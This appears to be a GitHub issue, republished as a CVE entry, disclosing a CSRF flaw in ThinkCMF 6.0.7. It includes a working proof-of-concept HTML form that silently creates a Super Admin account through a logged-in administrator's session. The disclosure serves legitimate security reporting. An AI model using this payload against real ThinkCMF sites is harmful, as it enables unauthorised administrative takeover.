Headline

CVE-2022-40489: I found a CSRF that creates a Super Admin account. · Issue #736 · thinkcmf/thinkcmf

ThinkCMF version 6.0.7 is affected by a Cross Site Request Forgery (CSRF) vulnerability that allows a Super Administrator user to be injected into administrative users.

2 years ago

CVE

Open in Source

#csrf #vulnerability

Hi,
I found a CSRF in ThinkCMF version 6.0.7 that allows a remote user to add a Super Admin account by taking advantage of the session of an administrator who is logged into the system. Below are the steps to reproduce this issue.

<html>
  <body>
  <h1>CSRF - SuperAdmin User Creation</h1>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/admin/user/addpost.html" method="POST">
      <input type="hidden" name="user_login" value="SuperAdmin" />
      <input type="hidden" name="user_pass" value="SuperAdmin999qweasd" />
      <input type="hidden" name="user_email" value="superadmin&#64;yopmail&#46;com" />
      <input type="hidden" name="role_id&#91;&#93;" value="2" />
      <input type="hidden" name="role_id&#91;&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      //document.forms[0].submit();
    </script>
  </body>
</html>

Fig. 1: Vulnerable page

Fig. 2: CSRF Payload

Fig. 3: CSRF Payload Executed

Fig. 4: Super Admin account added

Fig. 5: Super Admin logged in